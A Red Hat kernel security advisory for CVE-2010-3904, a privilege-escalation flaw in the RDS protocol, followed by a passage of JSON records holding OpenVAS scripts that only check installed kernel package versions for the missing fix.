The kernel packages contain the Linux kernel, the core of any Linux
operating system.
This update fixes the following security issue:
* The rds_page_copy_user() function in the Linux kernel Reliable Datagram
Sockets (RDS) protocol implementation was missing sanity checks. A local,
unprivileged user could use this flaw to escalate their privileges.
(CVE-2010-3904, Important)
Red Hat would like to thank Dan Rosenberg of Virtual Security Research for
reporting this issue.
Users should upgrade to these updated packages, which contain a backported
patch to correct this issue. The system must be rebooted for this update to
take effect.
{"openvas": [{"lastseen": "2019-05-29T18:37:08", "description": "Oracle Linux Local Security Checks ELSA-2010-2010", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2010-2010", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122305", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122305", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2010-2010.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122305\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:16:22 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2010-2010\");\n script_tag(name:\"insight\", value:\"ELSA-2010-2010 - kernel security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2010-2010\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2010-2010.html\");\n script_cve_id(\"CVE-2010-3904\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~194.17.1.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~194.17.1.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~194.17.1.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~194.17.1.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~194.17.1.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~194.17.1.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~194.17.1.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~194.17.1.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~194.17.1.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~194.17.1.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~194.17.1.0.2.el5~1.4.7~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~194.17.1.0.2.el5PAE~1.4.7~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~194.17.1.0.2.el5debug~1.4.7~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~194.17.1.0.2.el5xen~1.4.7~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~194.17.1.0.2.el5~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~194.17.1.0.2.el5PAE~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~194.17.1.0.2.el5debug~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~194.17.1.0.2.el5xen~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:31", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-08-09T00:00:00", "type": "openvas", "title": "CentOS Update for kernel CESA-2010:0792 centos5 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310880640", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880640", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2010:0792 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2010-October/017121.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880640\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2010:0792\");\n script_cve_id(\"CVE-2010-3904\");\n script_name(\"CentOS Update for kernel CESA-2010:0792 centos5 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"kernel on CentOS 5\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n This update fixes the following security issue:\n\n * The rds_page_copy_user() function in the Linux kernel Reliable Datagram\n Sockets (RDS) protocol implementation was missing sanity checks. A local,\n unprivileged user could use this flaw to escalate their privileges.\n (CVE-2010-3904, Important)\n\n Red Hat would like to thank Dan Rosenberg of Virtual Security Research for\n reporting this issue.\n\n Users should upgrade to these updated packages, which contain a backported\n patch to correct this issue. The system must be rebooted for this update to\n take effect.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:55:34", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2011-08-09T00:00:00", "type": "openvas", "title": "CentOS Update for kernel CESA-2010:0792 centos5 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:880640", "href": "http://plugins.openvas.org/nasl.php?oid=880640", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2010:0792 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n This update fixes the following security issue:\n \n * The rds_page_copy_user() function in the Linux kernel Reliable Datagram\n Sockets (RDS) protocol implementation was missing sanity checks. A local,\n unprivileged user could use this flaw to escalate their privileges.\n (CVE-2010-3904, Important)\n \n Red Hat would like to thank Dan Rosenberg of Virtual Security Research for\n reporting this issue.\n \n Users should upgrade to these updated packages, which contain a backported\n patch to correct this issue. The system must be rebooted for this update to\n take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"kernel on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2010-October/017121.html\");\n script_id(880640);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2010:0792\");\n script_cve_id(\"CVE-2010-3904\");\n script_name(\"CentOS Update for kernel CESA-2010:0792 centos5 i386\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-11T11:04:35", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2010-11-04T00:00:00", "type": "openvas", "title": "RedHat Update for kernel RHSA-2010:0792-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2018-01-10T00:00:00", "id": "OPENVAS:1361412562310870349", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870349", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2010:0792-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n This update fixes the following security issue:\n\n * The rds_page_copy_user() function in the Linux kernel Reliable Datagram\n Sockets (RDS) protocol implementation was missing sanity checks. A local,\n unprivileged user could use this flaw to escalate their privileges.\n (CVE-2010-3904, Important)\n\n Red Hat would like to thank Dan Rosenberg of Virtual Security Research for\n reporting this issue.\n\n Users should upgrade to these updated packages, which contain a backported\n patch to correct this issue. The system must be rebooted for this update to\n take effect.\";\n\ntag_affected = \"kernel on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-October/msg00028.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870349\");\n script_version(\"$Revision: 8356 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-10 09:00:39 +0100 (Wed, 10 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-04 12:09:38 +0100 (Thu, 04 Nov 2010)\");\n script_xref(name: \"RHSA\", value: \"2010:0792-01\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-3904\");\n script_name(\"RedHat Update for kernel RHSA-2010:0792-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-18T10:58:17", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2010-11-04T00:00:00", "type": "openvas", "title": "RedHat Update for kernel RHSA-2010:0792-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2017-12-18T00:00:00", "id": "OPENVAS:870349", "href": "http://plugins.openvas.org/nasl.php?oid=870349", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2010:0792-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n This update fixes the following security issue:\n\n * The rds_page_copy_user() function in the Linux kernel Reliable Datagram\n Sockets (RDS) protocol implementation was missing sanity checks. A local,\n unprivileged user could use this flaw to escalate their privileges.\n (CVE-2010-3904, Important)\n\n Red Hat would like to thank Dan Rosenberg of Virtual Security Research for\n reporting this issue.\n\n Users should upgrade to these updated packages, which contain a backported\n patch to correct this issue. The system must be rebooted for this update to\n take effect.\";\n\ntag_affected = \"kernel on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-October/msg00028.html\");\n script_id(870349);\n script_version(\"$Revision: 8153 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-18 07:30:39 +0100 (Mon, 18 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-04 12:09:38 +0100 (Thu, 04 Nov 2010)\");\n script_xref(name: \"RHSA\", value: \"2010:0792-01\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-3904\");\n script_name(\"RedHat Update for kernel RHSA-2010:0792-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", 